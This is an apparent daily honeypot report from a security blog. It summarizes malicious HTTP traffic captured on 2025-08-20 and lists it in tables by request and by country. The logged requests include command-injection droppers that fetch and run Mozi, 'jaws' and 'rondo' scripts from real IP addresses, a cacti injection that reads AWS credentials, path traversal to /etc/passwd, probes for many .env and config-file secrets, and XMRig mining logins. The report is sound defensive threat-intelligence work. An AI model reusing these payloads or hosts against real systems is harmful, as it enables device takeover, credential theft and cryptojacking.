Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-08-20

·1308 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-20
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 209 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3974 requests were recorded during the day, originating from 4 different countries, with a peak of 2936 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
BRGermany
USGermany
GBGermany
GBDubai

botnet_dropper_behaviour
#

remote_addrrequest
122.97.209.13827;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
197.45.114.121GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
45.156.87.165GET /cgi-bin/luci/er/reboot_link?link=%27%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hqf.sh%7Csh%60%27 HTTP/1.1
45.156.87.165GET /cgi-bin/luci/er/vlanTag?vlan_tag=%27%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hqf.sh%7Csh%60%27 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
942POST /users/loginusers/loginusers/login HTTP/1.1
952POST /users/loginusers/login HTTP/1.1
962POST /users/login HTTP/1.1
5752GET /raephaeyeip4fawe HTTP/1.1
5762GET /owa HTTP/1.1
5772GET /ews HTTP/1.1
5782POST /login.cgi HTTP/1.1
6322POST /favicon.ico HTTP/1.1
12541{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x1489f6ebc64b139fadd9fd10c301f1bdbae535f3\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
12661GET /Odin/http/call1755713325 HTTP/1.1
12671GET /OdinHttpCall1755713325 HTTP/1.1
12691GET /odinhttpcall1755713325 HTTP/1.1
12711{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2246iZmtzv97K4EfaWgrpK1dDeeEzD79fEV3RRGxRUm9sxZJn58BHhpGxT89QzpAwciJBXKoWT5AarG5fXuvRGsQZ1T4QQPea\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
13511GET /.envs/.production/.django HTTP/1.1
13941GET //1.1.1.1/../../../etc/passwd HTTP/1.1
14371GET /admin/.env~ HTTP/1.1
14381GET /admin/.env.save HTTP/1.1
14661GET /admin/config.php.bak HTTP/1.1
14971GET /admin/wp-config.php.old HTTP/1.1
15351GET /api/config.json HTTP/1.1
15941GET /autodiscover/autodiscover.xml HTTP/1.1
16811GET /backup/.env~ HTTP/1.1
16821GET /backup/.env.save HTTP/1.1
16831GET /backup/.env.old HTTP/1.1
16951GET /backup/config.php.bak HTTP/1.1
17101GET /backup/wp-config.php.old HTTP/1.1
17341GET /jp/ HTTP/1.1
17351GET /uk/ HTTP/1.1
17361GET /es/ HTTP/1.1
17371GET /us/ HTTP/1.1
17381GET /cacti/cmd_realtime.php?1+1&&cat+~/.aws/credentials+1+1+1 HTTP/1.1
17631GET /config/.env~ HTTP/1.1
17641GET /config/.env.save HTTP/1.1
17651GET /config/.env.old HTTP/1.1
17761GET /config/config.php.bak HTTP/1.1
18051GET /config/secrets.json HTTP/1.1
18321GET /core/.env.local HTTP/1.1
18331GET /core/.env.bak HTTP/1.1
18351GET /config/wp-config.php.old HTTP/1.1
18451GET /core/.env~ HTTP/1.1
18601GET /core/config.php.bak HTTP/1.1
18761GET /core/wp-config.php.old HTTP/1.1
18821GET /OdFd HTTP/1.1
19071GET /ecp/Current/exporttool HTTP/1.1
19961\x22\x00\x00\x00\x12 \x10\x03\x1A\x05:8080\x22\x05:8080*\x06test_02\x06123456
201218RQ\xDD^\xC77X~\x00\x00\x00\x01e\xDD6\xB0kU,/\xC2/\xC1\x8F’\xF1\x00B\xF37\xD0\xA1P\xCA\xD4\xC3N\xCC\x95\xBC\xF5\x8C\x1AY\xA6\x14\x5C(\xCC\xE6D\xADd
20261GET /nextjs-app/.env HTTP/1.1
20281GET /myproject/.env HTTP/1.1
20411GET /node-api/.env HTTP/1.1
20661GET /react-app/.env.production HTTP/1.1
20671GET /react-app/.env HTTP/1.1
20831GET /statistic/finishtask?siteid=20000&tid=9112 HTTP/1.1
21361GET /site/.env~ HTTP/1.1
21371GET /site/.env.save HTTP/1.1
21381GET /site/.env.old HTTP/1.1
21391GET /site/.env.local HTTP/1.1
21401GET /site/.env.bak HTTP/1.1
21481GET /site/config.php.bak HTTP/1.1
21631GET /site/wp-config.php.old HTTP/1.1
21751GET /src/.env~ HTTP/1.1
21761GET /src/.env.save HTTP/1.1
21771GET /src/.env.old HTTP/1.1
21871\x00\x00\x00o\x98I\xC7lp\xE4\x1BMM\x97<\xDF\xA9\xAE\xEB\x08\x00\x91o\x1D*R\xB1\xD6{nlUk\xE7\xA2\xFE5[*\xA7v\xA7C[\xEE\xC5vo4G\xC5#\xE8\x0Fu\xC9\x5C\xFD\xBB\xB4\xF3\x9C\xBB\xD7e`\xBF
21891GET /src/config.php.bak HTTP/1.1
21901GET /src/config.php HTTP/1.1
22201GET /i.dat HTTP/1.1
22361GET /src/wp-config.php.old HTTP/1.1
22601GET /web-console/ HTTP/1.1
22711GET /web/.env~ HTTP/1.1
22721GET /web/.env.save HTTP/1.1
22731GET /web/.env.old HTTP/1.1
23141GET /wordpress/wp-config.php HTTP/1.1
23151GET /web/wp-config.php.old HTTP/1.1
23161GET /web/config.php.bak HTTP/1.1
23251GET /wp-content/backup/sendgrid_keys.json HTTP/1.1
23261GET /wp-content/uploads/wp-mail-smtp/sendgrid_keys.json HTTP/1.1
23281GET /modules/contrib/sendgrid_mail/sendgrid_mail.services.yml HTTP/1.1
23291GET /modules/contrib/sendgrid_mail/sendgrid_mail.module HTTP/1.1
23311GET /wp-content/plugins/wp-mail-smtp/sendgrid_keys.json HTTP/1.1
23491GET /autodiscover/congress/ HTTP/1.1
23501GET /autodiscover/citizen/ HTTP/1.1
23511GET /autodiscover/because/ HTTP/1.1
23521GET /autodiscover/autodiscovers/ HTTP/1.1
23531GET /autodiscover/autodiscoverrs/ HTTP/1.1
23541GET /autodiscover/autodiscover%20/ HTTP/1.1
23571POST /cgi-bin/system_log.cgi? HTTP/1.1
23651GET /ews/autodiscovers/ HTTP/1.1
23661GET /ews/%20/ HTTP/1.1
23671GET /end/ HTTP/1.1
23681GET /empower/ HTTP/1.1
23691GET /dust/ HTTP/1.1
23701GET /delay/ HTTP/1.1
23711GET /behave/ HTTP/1.1
23721GET /autodiscover/verb/ HTTP/1.1
23731GET /autodiscover/tiger/ HTTP/1.1
23741GET /autodiscover/this/ HTTP/1.1
23751GET /autodiscover/surprise/ HTTP/1.1
23761GET /autodiscover/palace/ HTTP/1.1
23771GET /autodiscover/oppose/ HTTP/1.1
23781GET /autodiscover/make/ HTTP/1.1
23791GET /autodiscover/expire/ HTTP/1.1
23801GET /autodiscover/course/ HTTP/1.1
23811GET /ews/tower/ HTTP/1.1
23821GET /ews/test/ HTTP/1.1
23831GET /ews/six/ HTTP/1.1
23841GET /ews/sense/ HTTP/1.1
23851GET /ews/second/ HTTP/1.1
23861GET /ews/question/ HTTP/1.1
23871GET /ews/powder/ HTTP/1.1
23881GET /ews/pitch/ HTTP/1.1
23891GET /ews/often/ HTTP/1.1
23901GET /ews/jazz/ HTTP/1.1
23911GET /ews/feature/ HTTP/1.1
23921GET /ews/exchanges/ HTTP/1.1
23931GET /ews/exchange/ HTTP/1.1
23941GET /ews/exchange%20/ HTTP/1.1
23951GET /ews/ews/ HTTP/1.1
23961GET /ews/evoke/ HTTP/1.1
23971GET /lbsonlinesoc/august/ HTTP/1.1
23981GET /lbs/mystery/ HTTP/1.1
23991GET /lbsivr/travel/ HTTP/1.1
24001GET /lbsivr/pole/ HTTP/1.1
24011GET /lbsivr/noodle/ HTTP/1.1
24021GET /lbsivr/member/ HTTP/1.1
24031GET /lbs/blue/ HTTP/1.1
24041GET /lbs/alpha/ HTTP/1.1
24051GET /lbsadmin/valve/ HTTP/1.1
24061GET /lbsadmin/salon/ HTTP/1.1
24071GET /lbsadmin/disorder/ HTTP/1.1
24081GET /lbsadmin/cute/ HTTP/1.1
24091GET /hill/ HTTP/1.1
24101GET /fitness/ HTTP/1.1
24111GET /eye/ HTTP/1.1
24121GET /ews/trip/ HTTP/1.1
24131GET /oconlinesoc/silver/ HTTP/1.1
24141GET /oconlinesoc/provide/ HTTP/1.1
24151GET /oconlinesoc/nasty/ HTTP/1.1
24161GET /naive/ HTTP/1.1
24171GET /lbswap/useful/ HTTP/1.1
24181GET /lbswap/problem/ HTTP/1.1
24191GET /lbswap/goose/ HTTP/1.1
24201GET /lbswap/army/ HTTP/1.1
24211GET /lbs/special/ HTTP/1.1
24221GET /lbs/secure/seven/ HTTP/1.1
24231GET /lbs/secure/patch/ HTTP/1.1
24241GET /lbs/secure/model/ HTTP/1.1
24251GET /lbs/secure/feel/ HTTP/1.1
24261GET /lbsonlinesoc/shoulder/ HTTP/1.1
24271GET /lbsonlinesoc/menu/ HTTP/1.1
24281GET /lbsonlinesoc/gas/ HTTP/1.1
24291GET /route/ HTTP/1.1
24301GET /pulllocation/region/ HTTP/1.1
24311GET /pulllocation/jungle/ HTTP/1.1
24321GET /pulllocation/choice/ HTTP/1.1
24331GET /pulllocation/cabbage/ HTTP/1.1
24341GET /pelephoneprovisioning/stable/ HTTP/1.1
24351GET /pelephoneprovisioning/noodle/ HTTP/1.1
24361GET /pelephoneprovisioning/network/ HTTP/1.1
24371GET /pelephoneprovisioning/dizzy/ HTTP/1.1
24381GET /oshee/ HTTP/1.1
24391GET /onlinesoc/toddler/ HTTP/1.1
24401GET /onlinesoc/pole/ HTTP/1.1
24411GET /onlinesoc/man/ HTTP/1.1
24421GET /onlinesoc/fall/ HTTP/1.1
24431GET /ofasdaqgrumm/ HTTP/1.1
24441GET /oconlinesoc/usual/ HTTP/1.1
24461GET /utilities/.env HTTP/1.1
24491GET /test/.env.conf HTTP/1.1
24501GET /tmp/.env.token HTTP/1.1
24561GET /vzixmvmvbvrzhoo/ HTTP/1.1
24571GET /utkvvxwkwgseowps/ HTTP/1.1
24581GET /uncle/ HTTP/1.1
24591GET /Temporary_Listen_Addresses/ HTTP/1.1
24601GET /swear/ HTTP/1.1
24651GET /sicherung/.env HTTP/1.1
24661GET /src/env/env.ts HTTP/1.1
24691GET /tmp/.env.local HTTP/1.1
24721GET /var/.env.local HTTP/1.1
24731GET /staging/.env.1 HTTP/1.1
24741GET /symfony/env.py HTTP/1.1
24751GET /printenv.shtml HTTP/1.1
24761GET /staging/.env.2 HTTP/1.1
24771GET /panel/.env.old HTTP/1.1
24781GET /panel/.env.pem HTTP/1.1
24791GET /panel/.env.tmp HTTP/1.1
24801GET /panel/.env.uat HTTP/1.1
25051POST /cgi-bin/adv_remotelog.asp HTTP/1.1
25061GET /panel/.env.gcp HTTP/1.1
25071GET /panel/.env.key HTTP/1.1
25081GET /panel/.env.log HTTP/1.1
25091GET /download/file.extusers/loginusers/login HTTP/1.1
25101GET /download/file.extusers/login HTTP/1.1
25111GET /ausers/loginusers/loginusers/login HTTP/1.1
25121GET /ausers/loginusers/login HTTP/1.1
25131GET /ausers/login HTTP/1.1
25141GET /users/loginusers/loginusers/login HTTP/1.1
25151GET /users/loginusers/login HTTP/1.1
25161{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22454cKeGgMdnaw1J5zonuXb96XEfP2X51Z7oECWKpfjYPdhTm5kUpi6BBEuvUaxuL2p8s9YchmGaNTWTZKUXcYBcqTx4SUNQ\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
25171{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x6ee7628c6ade21a4148047f7bc4748859ac85f84\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
25331\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xEFM\xB4\xBF\xEA
25341GET /mPlayerusers/loginusers/loginusers/login HTTP/1.1
25351GET /mPlayerusers/loginusers/login HTTP/1.1
25361GET /mPlayerusers/login HTTP/1.1
25371GET /SiteLoaderusers/loginusers/loginusers/login HTTP/1.1
25381GET /SiteLoaderusers/loginusers/login HTTP/1.1
25391GET /SiteLoaderusers/login HTTP/1.1
25401GET /download/file.extusers/loginusers/loginusers/login HTTP/1.1
25581\x00\x0E89\xB7\xED\xF2#\xE1
25591\x00\x0E\x089\xB7\xED\xF2#\xE1

country_iso_code
#

number_of_occurencecountry_iso_code
02936GB
1608HK
297SG
387US
482BG
537ES
633NL
729DE
818SC
95IN
105CA
114RO
124BR
133JP
143LT
153ZA
162MM
172HR
182SA
192PL
202BE
212MC
221TR
231PT
241CN
251EG
261RU
271GR
281SI
291IR

Related

Report: 2025-08-19
·327 words
Repport Daily
Report: 2025-08-18
·1246 words
Repport Daily
Report: 2025-08-17
·2205 words
Repport Daily